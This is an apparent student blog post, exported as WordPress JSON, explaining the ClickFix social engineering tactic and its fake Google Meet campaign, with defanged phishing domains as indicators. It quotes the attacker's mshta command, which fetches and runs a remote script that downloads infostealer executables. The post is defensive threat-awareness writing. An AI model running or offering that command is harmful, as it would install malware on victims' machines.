{"id":893,"date":"2024-10-23T17:00:19","date_gmt":"2024-10-23T23:00:19","guid":{"rendered":"https:\/\/wpsites.ucalgary.ca\/jacobson-cpsc\/?p=893"},"modified":"2024-10-23T17:00:50","modified_gmt":"2024-10-23T23:00:50","slug":"the-clickfix-social-engineering-tactic","status":"publish","type":"post","link":"https:\/\/wpsites.ucalgary.ca\/jacobson-cpsc\/2024\/10\/23\/the-clickfix-social-engineering-tactic\/","title":{"rendered":"The ClickFix Social Engineering Tactic"},"content":{"rendered":"\n<p>In May 2024, a new social engineering tactic called ClickFix emerged which involves displaying fake error messages in web browsers to deceive users into copying and executing a given malicious PowerShell Command.<\/p>\n\n\n\n<p>According to Proofpoint researchers[1], who named this tactic <strong>ClickFix<\/strong>, they reported that the initial access broker TA571 leveraged it in email phishing campaigns since March 2024. They used HTML files disguised as Word documents, displaying a fake error window that prompts users to install malware such as Matanbuchus, DarkGate, or NetSupport RAT via a PowerShell script.<\/p>\n\n\n\n<p>In recent months, multiple malware distribution campaigns have been using ClickFix to spread Windows and macOS malware. This is in an attempt to bypass browsers, anti viruses, and other security features.<\/p>\n\n\n\n<p>Bellow is a timeline of the proliferation of the ClickFix social engineering tactic over time:<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img decoding=\"async\" width=\"1024\" height=\"640\" data-src=\"https:\/\/wpsites.ucalgary.ca\/jacobson-cpsc\/wp-content\/uploads\/sites\/119\/2024\/10\/timeline-clickfix-1024x640.png\" alt=\"\" class=\"wp-image-890 lazyload\" data-srcset=\"https:\/\/wpsites.ucalgary.ca\/jacobson-cpsc\/wp-content\/uploads\/sites\/119\/2024\/10\/timeline-clickfix-1024x640.png 1024w, https:\/\/wpsites.ucalgary.ca\/jacobson-cpsc\/wp-content\/uploads\/sites\/119\/2024\/10\/timeline-clickfix-300x188.png 300w, https:\/\/wpsites.ucalgary.ca\/jacobson-cpsc\/wp-content\/uploads\/sites\/119\/2024\/10\/timeline-clickfix-768x480.png 768w, https:\/\/wpsites.ucalgary.ca\/jacobson-cpsc\/wp-content\/uploads\/sites\/119\/2024\/10\/timeline-clickfix-1536x960.png 1536w, https:\/\/wpsites.ucalgary.ca\/jacobson-cpsc\/wp-content\/uploads\/sites\/119\/2024\/10\/timeline-clickfix-1568x980.png 1568w, https:\/\/wpsites.ucalgary.ca\/jacobson-cpsc\/wp-content\/uploads\/sites\/119\/2024\/10\/timeline-clickfix.png 1600w\" data-sizes=\"(max-width: 1024px) 100vw, 1024px\" src=\"data:image\/svg+xml;base64,PHN2ZyB3aWR0aD0iMSIgaGVpZ2h0PSIxIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciPjwvc3ZnPg==\" style=\"--smush-placeholder-width: 1024px; --smush-placeholder-aspect-ratio: 1024\/640;\" \/><figcaption class=\"wp-element-caption\">by Sekoia<\/figcaption><\/figure>\n\n\n\n<p>As you can see, this tactic was first discovered in March and as become more and more sophisticated to the point where they are impersonating Google Chrome, Facebook, PDFSimpli, reCAPTCHA, and more recently Google Meets.<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img decoding=\"async\" width=\"1024\" height=\"750\" data-src=\"https:\/\/wpsites.ucalgary.ca\/jacobson-cpsc\/wp-content\/uploads\/sites\/119\/2024\/10\/sample-clickfix-1024x750.png\" alt=\"\" class=\"wp-image-889 lazyload\" data-srcset=\"https:\/\/wpsites.ucalgary.ca\/jacobson-cpsc\/wp-content\/uploads\/sites\/119\/2024\/10\/sample-clickfix-1024x750.png 1024w, https:\/\/wpsites.ucalgary.ca\/jacobson-cpsc\/wp-content\/uploads\/sites\/119\/2024\/10\/sample-clickfix-300x220.png 300w, https:\/\/wpsites.ucalgary.ca\/jacobson-cpsc\/wp-content\/uploads\/sites\/119\/2024\/10\/sample-clickfix-768x563.png 768w, https:\/\/wpsites.ucalgary.ca\/jacobson-cpsc\/wp-content\/uploads\/sites\/119\/2024\/10\/sample-clickfix.png 1536w\" data-sizes=\"(max-width: 1024px) 100vw, 1024px\" src=\"data:image\/svg+xml;base64,PHN2ZyB3aWR0aD0iMSIgaGVpZ2h0PSIxIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciPjwvc3ZnPg==\" style=\"--smush-placeholder-width: 1024px; --smush-placeholder-aspect-ratio: 1024\/750;\" \/><figcaption class=\"wp-element-caption\">by Sekoia<\/figcaption><\/figure>\n\n\n\n<p>The targets of these attacks are usually people who need to click links for work, especially meeting links. According to Sekoia[2], transport and logistics companies in North America have been targeted by this tactic from at least May to August 2024 by using websites that impersonate transport and fleet operations management software.<\/p>\n\n\n\n<p>The most recent victim of this was Google Meet. These bad actors create domains that look like official Google Meet domains and then once the user is on the page, they are prompted with an error. The solution always being to copy a command onto your clipboard and then paste and run it in the command line<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img decoding=\"async\" width=\"1024\" height=\"761\" data-src=\"https:\/\/wpsites.ucalgary.ca\/jacobson-cpsc\/wp-content\/uploads\/sites\/119\/2024\/10\/meet-clickfix-1024x761.png\" alt=\"\" class=\"wp-image-888 lazyload\" data-srcset=\"https:\/\/wpsites.ucalgary.ca\/jacobson-cpsc\/wp-content\/uploads\/sites\/119\/2024\/10\/meet-clickfix-1024x761.png 1024w, https:\/\/wpsites.ucalgary.ca\/jacobson-cpsc\/wp-content\/uploads\/sites\/119\/2024\/10\/meet-clickfix-300x223.png 300w, https:\/\/wpsites.ucalgary.ca\/jacobson-cpsc\/wp-content\/uploads\/sites\/119\/2024\/10\/meet-clickfix-768x571.png 768w, https:\/\/wpsites.ucalgary.ca\/jacobson-cpsc\/wp-content\/uploads\/sites\/119\/2024\/10\/meet-clickfix-1536x1141.png 1536w, https:\/\/wpsites.ucalgary.ca\/jacobson-cpsc\/wp-content\/uploads\/sites\/119\/2024\/10\/meet-clickfix-1568x1165.png 1568w, https:\/\/wpsites.ucalgary.ca\/jacobson-cpsc\/wp-content\/uploads\/sites\/119\/2024\/10\/meet-clickfix.png 1600w\" data-sizes=\"(max-width: 1024px) 100vw, 1024px\" src=\"data:image\/svg+xml;base64,PHN2ZyB3aWR0aD0iMSIgaGVpZ2h0PSIxIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciPjwvc3ZnPg==\" style=\"--smush-placeholder-width: 1024px; --smush-placeholder-aspect-ratio: 1024\/761;\" \/><figcaption class=\"wp-element-caption\">by Sekoia<\/figcaption><\/figure>\n\n\n\n<p>Sekoia were able to identify the following domain names and IP address:<br><em>meet[.]google[.]us-join[.]com<\/em><br><em>meet[.]googie[.]com-join[.]us<\/em><br><em>meet[.]google[.]com-join[.]us<\/em><br><em>meet[.]google[.]web-join[.]com<\/em><br><em>meet[.]google[.]webjoining[.]com<\/em><br><em>meet[.]google[.]cdm-join[.]us<\/em><br><em>meet[.]google[.]us07host[.]com<\/em><br><em>googiedrivers[.]com<\/em><br><em>hxxps:\/\/meet[.]google[.]com-join[.]us\/wmq-qcdn-orj<\/em><br><em>hxxps:\/\/meet[.]google[.]us-join[.]com\/ywk-batf-sfh<\/em><br><em>hxxps:\/\/meet[.]google[.]us07host[.]com\/coc-btru-ays<\/em><br><em>hxxps:\/\/meet[.]google[.]webjoining[.]com\/exw-jfaj-hpa<\/em><\/p>\n\n\n\n<p>Note how they look like real google links except for the symbols. Most people will not even look twice before clicking these links.<\/p>\n\n\n\n<p>What does the Command Do?<\/p>\n\n\n\n<blockquote class=\"wp-block-quote is-layout-flow wp-block-quote-is-layout-flow\">\n<p><em>mshta hxxps:\/\/googIedrivers[.]com\/fix-error<\/em><\/p>\n<\/blockquote>\n\n\n\n<p>The command basically runs the fix-error file hosted on their domain. The file contains a VB script that does the following:<\/p>\n\n\n\n<ol class=\"wp-block-list\">\n<li>It terminates its parent process (mshta.exe).<\/li>\n\n\n\n<li>It downloads two executables (stealc.exe and ram.exe) using bitsadmin. After a two-seconds delay, it notifies the C2 server (webapizmland[.]com) about the success or failure of running the executables.<\/li>\n\n\n\n<li>It retrieves the victim\u2019s public IP address using the service api.ipify[.]org and sends it to the C2 server along the execution status.<\/li>\n<\/ol>\n\n\n\n<figure class=\"wp-block-image size-large\"><img decoding=\"async\" width=\"741\" height=\"1024\" data-src=\"https:\/\/wpsites.ucalgary.ca\/jacobson-cpsc\/wp-content\/uploads\/sites\/119\/2024\/10\/code-clickfix-741x1024.png\" alt=\"\" class=\"wp-image-891 lazyload\" data-srcset=\"https:\/\/wpsites.ucalgary.ca\/jacobson-cpsc\/wp-content\/uploads\/sites\/119\/2024\/10\/code-clickfix-741x1024.png 741w, https:\/\/wpsites.ucalgary.ca\/jacobson-cpsc\/wp-content\/uploads\/sites\/119\/2024\/10\/code-clickfix-217x300.png 217w, https:\/\/wpsites.ucalgary.ca\/jacobson-cpsc\/wp-content\/uploads\/sites\/119\/2024\/10\/code-clickfix-768x1061.png 768w, https:\/\/wpsites.ucalgary.ca\/jacobson-cpsc\/wp-content\/uploads\/sites\/119\/2024\/10\/code-clickfix-1112x1536.png 1112w, https:\/\/wpsites.ucalgary.ca\/jacobson-cpsc\/wp-content\/uploads\/sites\/119\/2024\/10\/code-clickfix.png 1158w\" data-sizes=\"(max-width: 741px) 100vw, 741px\" src=\"data:image\/svg+xml;base64,PHN2ZyB3aWR0aD0iMSIgaGVpZ2h0PSIxIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciPjwvc3ZnPg==\" style=\"--smush-placeholder-width: 741px; --smush-placeholder-aspect-ratio: 741\/1024;\" \/><figcaption class=\"wp-element-caption\">by Sekoia<\/figcaption><\/figure>\n\n\n\n<p>According to Sekoia the threat actors are members of the traffers team \u201cSlavic Nation Empire (SNE)\u201c, which is a sub-team of the cryptocurrency scam team \u201c<em>Marko Polo<\/em>\u201c.<\/p>\n\n\n\n<p>These types of social engineering tactics are becoming more common, and the worst part about them is that the user does all the work. There is no security system that can educate users on what not todo. The more convincing the social engineering the harder it is to combat.<\/p>\n\n\n\n<p>References<br>1. <a href=\"https:\/\/www.proofpoint.com\/us\/blog\/threat-insight\/clipboard-compromise-powershell-self-pwn\">https:\/\/www.proofpoint.com\/us\/blog\/threat-insight\/clipboard-compromise-powershell-self-pwn<\/a><\/p>\n\n\n\n<p>2. <a href=\"https:\/\/blog.sekoia.io\/clickfix-tactic-the-phantom-meet\/\">https:\/\/blog.sekoia.io\/clickfix-tactic-the-phantom-meet\/<\/a><\/p>\n\n\n\n<p>3. <a href=\"https:\/\/www.bleepingcomputer.com\/news\/security\/fake-google-meet-conference-errors-push-infostealing-malware\/\">https:\/\/www.bleepingcomputer.com\/news\/security\/fake-google-meet-conference-errors-push-infostealing-malware\/<\/a><\/p>\n\n\n\n<p><\/p>\n","protected":false},"excerpt":{"rendered":"<p>In May 2024, a new social engineering tactic called ClickFix emerged which involves displaying fake error messages in web browsers to deceive users into copying and executing a given malicious PowerShell Command. According to Proofpoint researchers[1], who named this tactic ClickFix, they reported that the initial access broker TA571 leveraged it in email phishing campaigns &hellip; <\/p>\n<p class=\"link-more\"><a href=\"https:\/\/wpsites.ucalgary.ca\/jacobson-cpsc\/2024\/10\/23\/the-clickfix-social-engineering-tactic\/\" class=\"more-link\">Continue reading<span class=\"screen-reader-text\"> &#8220;The ClickFix Social Engineering Tactic&#8221;<\/span><\/a><\/p>\n","protected":false},"author":681,"featured_media":892,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"ngg_post_thumbnail":0,"footnotes":""},"categories":[1],"tags":[],"class_list":["post-893","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-uncategorized","entry"],"featured_image_src":"https:\/\/wpsites.ucalgary.ca\/jacobson-cpsc\/wp-content\/uploads\/sites\/119\/2024\/10\/meet-banner-600x400.png","featured_image_src_square":"https:\/\/wpsites.ucalgary.ca\/jacobson-cpsc\/wp-content\/uploads\/sites\/119\/2024\/10\/meet-banner-600x584.png","author_info":{"display_name":"Abdul Salawu","author_link":"https:\/\/wpsites.ucalgary.ca\/jacobson-cpsc\/author\/abdul-salawu\/"},"_links":{"self":[{"href":"https:\/\/wpsites.ucalgary.ca\/jacobson-cpsc\/wp-json\/wp\/v2\/posts\/893","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/wpsites.ucalgary.ca\/jacobson-cpsc\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/wpsites.ucalgary.ca\/jacobson-cpsc\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/wpsites.ucalgary.ca\/jacobson-cpsc\/wp-json\/wp\/v2\/users\/681"}],"replies":[{"embeddable":true,"href":"https:\/\/wpsites.ucalgary.ca\/jacobson-cpsc\/wp-json\/wp\/v2\/comments?post=893"}],"version-history":[{"count":1,"href":"https:\/\/wpsites.ucalgary.ca\/jacobson-cpsc\/wp-json\/wp\/v2\/posts\/893\/revisions"}],"predecessor-version":[{"id":894,"href":"https:\/\/wpsites.ucalgary.ca\/jacobson-cpsc\/wp-json\/wp\/v2\/posts\/893\/revisions\/894"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/wpsites.ucalgary.ca\/jacobson-cpsc\/wp-json\/wp\/v2\/media\/892"}],"wp:attachment":[{"href":"https:\/\/wpsites.ucalgary.ca\/jacobson-cpsc\/wp-json\/wp\/v2\/media?parent=893"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/wpsites.ucalgary.ca\/jacobson-cpsc\/wp-json\/wp\/v2\/categories?post=893"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/wpsites.ucalgary.ca\/jacobson-cpsc\/wp-json\/wp\/v2\/tags?post=893"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}